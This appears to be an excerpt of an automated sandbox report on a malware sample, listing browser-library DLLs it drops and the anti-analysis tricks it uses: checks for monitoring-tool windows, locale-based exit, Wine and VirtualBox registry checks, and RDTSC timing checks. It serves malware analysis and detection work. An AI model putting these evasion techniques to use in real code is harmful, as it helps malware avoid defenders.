Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00489860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58163

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D203E second address: 6D2042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D2042 second address: 6D204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84EC00 second address: 84EC10 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F81D5048956h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DBCB second address: 84DBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DEE0 second address: 84DEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DEE4 second address: 84DF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F81D4B5DC67h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DF05 second address: 84DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DF19 second address: 84DF49 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F81D4B5DC69h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F81D4B5DC60h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DF49 second address: 84DF4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84E4D0 second address: 84E4F3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F81D4B5DC6Dh 0x00000008 jmp 00007F81D4B5DC65h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84E4F3 second address: 84E4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84E4F7 second address: 84E4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8512A3 second address: 8512A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851336 second address: 851362 instructions: 0x00000000 rdtsc 0x00000002 js 00007F81D4B5DC5Ch 0x00000008 jnp 00007F81D4B5DC56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F81D4B5DC69h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851362 second address: 85136C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F81D504895Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85136C second address: 851399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jne 00007F81D4B5DC56h 0x00000013 jmp 00007F81D4B5DC69h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851399 second address: 8513B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007F81D5048964h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8513B7 second address: 8513BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851471 second address: 851475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851475 second address: 8514BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edx 0x0000000d js 00007F81D4B5DC56h 0x00000013 pop edx 0x00000014 jmp 00007F81D4B5DC60h 0x00000019 popad 0x0000001a pop eax 0x0000001b cmc 0x0000001c lea ebx, dword ptr [ebp+124531D8h] 0x00000022 sub dword ptr [ebp+122D2E16h], ebx 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F81D4B5DC5Fh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851515 second address: 85151F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85151F second address: 851523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851523 second address: 851527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851527 second address: 851568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jns 00007F81D4B5DC5Ch 0x0000000e push 00000000h 0x00000010 mov esi, dword ptr [ebp+122D2B56h] 0x00000016 call 00007F81D4B5DC59h 0x0000001b push edx 0x0000001c jne 00007F81D4B5DC63h 0x00000022 jmp 00007F81D4B5DC5Dh 0x00000027 pop edx 0x00000028 push eax 0x00000029 push ebx 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851568 second address: 85158A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F81D5048966h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85158A second address: 851590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851590 second address: 851594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851594 second address: 851598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851598 second address: 851634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F81D504895Fh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F81D5048962h 0x00000018 pop eax 0x00000019 jbe 00007F81D5048956h 0x0000001f push 00000003h 0x00000021 mov edi, dword ptr [ebp+122D29EAh] 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D31C2h], edx 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F81D5048958h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D3326h], edx 0x00000051 sub dl, FFFFFFDDh 0x00000054 call 00007F81D5048959h 0x00000059 jmp 00007F81D5048968h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pushad 0x00000063 popad 0x00000064 pop ecx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851634 second address: 851652 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F81D4B5DC58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007F81D4B5DC5Ah 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851652 second address: 851658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 851658 second address: 85165C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85165C second address: 85169F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007F81D504897Ch 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F81D5048956h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85169F second address: 8516D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b pop eax 0x0000000c push edi 0x0000000d adc ecx, 4D3E79C1h 0x00000013 pop edi 0x00000014 lea ebx, dword ptr [ebp+124531E1h] 0x0000001a or edi, dword ptr [ebp+122D286Eh] 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F81D4B5DC60h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872459 second address: 87245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87245F second address: 872480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC67h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872480 second address: 872487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872487 second address: 87248E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87248E second address: 87249B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007F81D504895Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87053D second address: 870543 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 870C8E second address: 870C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 870DE7 second address: 870DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 870F71 second address: 870F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 870F77 second address: 870F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F81D4B5DC64h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8714CB second address: 8714F3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F81D5048956h 0x00000008 jmp 00007F81D5048966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F81D5048956h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 868896 second address: 8688D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jne 00007F81D4B5DC6Eh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F81D4B5DC5Ch 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8688D0 second address: 8688DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F81D504895Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8450AF second address: 8450B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871B94 second address: 871B9E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F81D504895Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871CD1 second address: 871CD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871CD7 second address: 871CDC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871FD6 second address: 871FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F81D4B5DC56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871FE7 second address: 871FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871FEB second address: 871FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871FF3 second address: 871FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 871FF8 second address: 872003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872003 second address: 872009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872009 second address: 872022 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F81D4B5DC5Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 873C04 second address: 873C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 873C0E second address: 873C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 873C1C second address: 873C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83AF39 second address: 83AF45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F81D4B5DC56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83AF45 second address: 83AF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 841A87 second address: 841A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87913F second address: 879159 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D5048956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F81D5048958h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879159 second address: 87916F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879A20 second address: 879A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879A24 second address: 879A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 879A2E second address: 879A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87EE05 second address: 87EE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83AF35 second address: 83AF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87E529 second address: 87E540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87FCDF second address: 87FCE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F81D504895Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87FCE9 second address: 87FD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87FD02 second address: 87FD27 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D5048966h 0x00000008 jmp 00007F81D5048960h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F81D5048956h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8803C3 second address: 8803DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F81D4B5DC5Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880DBA second address: 880DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880DC0 second address: 880DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 880DC4 second address: 880DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88124C second address: 881251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 881251 second address: 881256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 881256 second address: 88125C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
